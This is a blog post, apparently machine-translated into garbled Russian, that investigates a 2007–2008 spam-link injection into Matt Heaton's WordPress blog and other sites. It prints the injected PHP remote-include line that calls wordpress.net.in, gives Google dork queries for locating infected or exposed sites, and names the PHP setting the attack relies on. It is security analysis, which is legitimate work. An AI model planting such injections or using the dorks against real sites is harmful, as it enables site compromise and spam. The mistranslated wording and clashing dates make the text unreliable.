11 декабря 2007 - Мэтт Хитон блога был чистке. Банкомат он использует последнюю версию WordPress (2.3.x). А также большая часть блогов в списках этой статьи был обновление.
26 января 2008 год - кажется bluehost инженер сделал плохую работу по уборке, Горо спам снова.
Просто после недавнего вопроса о wordpress.com.cn теперь есть новый Wordpress imitater. Дистанционное spamware путем инъекций wordpress.net.in Я читал один из Мэтт Хитон размещены 2 дня назад, когда я нашел кучу spamsware ссылку на свой Wordpress колонтитул.
Мэтт в использует по умолчанию wodpress тему (Кубрик), с одной JavaScript для AdSense. Единственный способ спам можно получить в, возможно, через PHP-инъекции или путем ручного редактирования. Все spamware является перенаправление на howardowens.com /? Порядок = XX странице.
Поиск по howardowens.com
Диаграмме ниже объяснил результаты поиска для howardowens.com. Кликните на картинку для увеличения.
Удивительно спамера сайте также принимающих на bluehost.com (69.89.16.0/20, 74.220.192.0/19, 69.89.16.4 -> box183.bluehost.com).Отслеживание источников спама.
Просмотр mattheaton.com HTML источниках я обнаружил некоторые намек и начать поиск xanax intext: ID = \ "Гора \". Google вернуться 2 результатов по данному запросу. - 1. Wordpress поддержки
- PHP получить колонтитул добавив спам код?
- 2. Elijahzarwan.net
- Div ID = "Гора" (Ницца заголовок)
Оба сайта предлагают же типа PHP-инъекции методы
include('http://wordpress.net.in/statcounter.php');Statcounter.php просто обычный текст / равнина полном объеме спама ссылки. Спам содержание Мэтт Хитон блог случайно генерировать из http://wordpress.net.in/ [случайные] / Random = 1 - 9.
Сырье Whois для wordpress.net.in
Домен ID: D2500581-афина Доменное имя: WORDPRESS.NET.IN Создано На :22-Dec-2007 12:01:55 UTC Последняя модификация :22-Jun-2007 02:26:40 UTC Срок действия :22-Dec-2008 12:01:55 UTC Спонсорство Секретарь: прямая информация ПВТ. ООО DBA PublicDomainRegistry.com (R5-импульса) Статус: OK Регистрант ID: DI_4275224 Регистрант имя: Мик Джаггер Регистрант организация: N / A Регистрант Street1: 1 Красная площадь Регистрант город: Москва Регистрант Штат / провинция: Массачусетс Регистрант Почтовый индекс: 123592 Регистрант Страна: RU Регистрант Телефон: 007,7581235641 Регистрант Email: mkk.goro @ bk.ru Код администратора: DI_4275224 Имя администратора: Мик Джаггер Администратор Организация: N / A Администратор Street1: 1 Красная площадь Администратор Город: Москва Администратор Штат / провинция: Массачусетс Администратор Почтовый индекс: 123592 Администратор Страна: RU Телефон администратора: 007,7581235641 Администратор Email: mkk.goro @ bk.ru Технология ID: DI_4275224 Технология Название: Мик Джаггер Технология организации: N / A Технология Street1: 1 Красная площадь Технология город: Москва Технология Штат / провинция: Массачусетс Технология Почтовый индекс: 123592 Технология Страна: RU Технология Телефон: 007,7581235641 Технология E-mail: mkk.goro @ bk.ru Название сервера: MKKG98981.MERCURY.ORDERBOX-DNS.COM Название сервера: MKKG98981.VENUS.ORDERBOX-DNS.COM Название сервера: MKKG98981.EARTH.ORDERBOX-DNS.COM Название сервера: MKKG98981.MARS.ORDERBOX-DNS.COM
Примечание: заявление о регистрации по адресу 1 красный квадрат известного ресторана в Москве.
Ее довольно очевидным, что wordpress.net.in принадлежат к регистратору в Индии.
Живой пример wordpress.net.in впрыск
Google запрос на предупреждение "[function.include]" allintext: "wordpress.net.in". Б скрипач или любой HTTP-инспектор проследить полный заголовок запроса.
- 1 Эван Моррис
- Wordpress 2.0.6 | URL | скриншот
- 2 carwax
- Wordpress 1.5.2 | URL | скриншот
- 3 aabenthus.biz
- Wordpress 2.0.x | URL | скриншот
- 4 mythinger.com
- Wordpress 2.0.2 | URL | скриншот
- 5 classicalanglican.net
- Wordpress 2.0.2 | URL | скриншот
- 6 echo9er.net
- WordPress 1.5.1 | URL | скриншот
- 7 boyarick.com
- Wordpress 2.0.2 | URL | скриншот
Каталог Google Search для класса mail.php
Поиск класс-mail.php в Open Directory (государственные).
"Родительский каталог" Класс-mail.php-HTML, HTM-PHP-shtml-MD5-Суммы MD5SUMS- Жан-cyril.com - РГ-включает в себя спам ссылка переадресацию на www.901am.com/?page=2157. Жан-cyril.com имеет РГ-info.txt внутри его WP-включает в себя каталог. Это текстовые файлы, базы данных проведет unserialize пароля и прочее.
- floaridablog.org - РГ-включает в себя спам переадресацию на communications.uml.edu / восход /? ID = 1076 (университет штата Массачусетс Ловелл) оскорбительный спам страница была удалена по UML сопровождающий.
Сокрытие от "паукам" поисковых систем
Во-первых, я сделал несколько сравнительный поиск в archive.org для howardowens.com и mattheaton.com. Она в свою очередь, как этого сайта была остановка от ИА Archiver несколько месяцев до начала спам с указанием на их колонтитул. Вам необходимо проверить howardowens индекс по archive.org так что вы можете понять мои подозрения.
- http://web.archive.org/web/ * http://www.howardowens.com
- http://web.archive.org/web/ * http://www.mattheaton.com
Из скуки я маскируют себя следующие агенты.
- Mozilla/5.0 (совместимый; Yahoo! Чавкать; http://help.yahoo.com/help/us/ysearch/slurp) - 74.6.8.125 - llf520032.crawl.yahoo.net
- Mozilla/5.0 (совместимый; Googlebot/2.1; http://www.google.com/bot.html) 66.249.64.50 - сканирование-66-249-64-50.googlebot.com
- Mozilla/2.0 (совместимый; Спросите Jeeves / Teoma) - 65.214.44.204 - egspd42002.ask.com
- Mediapartners-Google/2.1 66.249.73.213 - сканирование-66-249-73-213.googlebot.com
Не так много изменений по обе эти сайты. Затем я прочитал заголовок статуса, это возвращение 404 вместо 200. Ницца приемы для остановки сканер И паук от шпионажа их радость-ездить-spamhouse.
Резюме
И биты байта от этой аварии мы знали, что
- Большая часть сайта привнести запущенных на Wordpress 2.0.6 И ниже
- allow_furl_open установлен верно для этой инъекции на работу
- Большинство блогов владелец не знает о спам ссылки (cloacking)
Оформить Мюррей журнал доступа, она даст вам некоторые идеи с удаленным инъекции методами.
Обновление
- Dec 03 2007
- Все спам ссылка на howardowens.com страница была удалена. Я нету разговаривать с howardowens, но я предполагаю, Ховард сайт в настоящее время вводится так же, как и Мэтт Хитон блоге.
- Dec 04 2007
- Mattheaton.com имеет незначительные обновления, спам в настоящее время привнести на верхний и нижний колонтитулы.
tangonoticias.com: 7070/d_pill/577.html.
Как tangonoticias.com работает на CMS Joomla они создают статических "Wordpress" на порт 7070 (Real сетевой сервер И RSTP порт). Это, вероятно, работа различных злоумышленник, воспользовавшись Мэтт Хитон blindspot. Кэша Google (12 ноября) - 11 декабря 2007
- Мэтт Хитон был чистый. Он теперь используется последняя версия Wordpress (2.3.1). Вы все еще можете увидеть на кэшированные мысли И скриншота.
Связанные пост
- Как Удалено wordpress.net.in Спам инъекций
- 31 январь 2008 года - Мэтт Хитон Bluehost Hostmonster ГАС взломали Опять же - Забастовка II
Внешние ссылки
- 1 декабря 2007 в 9:55 утра
- 21 Февраля 2008 в 12:27 утра
- 0,3
- URL
"писать, как если бы вы разговаривали с хорошим другом (в передней части вашей матери).
. Ваш говорят
Оговорка: Для любого содержания, которое вы разместите, Вы тем самым предоставляете Kakkoi роялти, окончательное, вечное, эксклюзивные и сублицензируемое на использование, воспроизведение, модификацию, адаптацию, публикацию, перевод, создание производной работы, не распространять, исполнять или показывать такое содержимое полностью или частично, во всем мире и включение его в другие произведения в любой форме, в средствах массовой информации или технологии, в настоящее время известен или поздно разработать. Некоторые права защищены.










Один ответ на "Мэтт Хитон BlueHost HostMonster ГАС Официальный блог взломали"
[...] הבלוג הרשמי של מט הטון נשיא חברות האחסון אתרים:, blueHost И HostMonsr נפרץ. [...]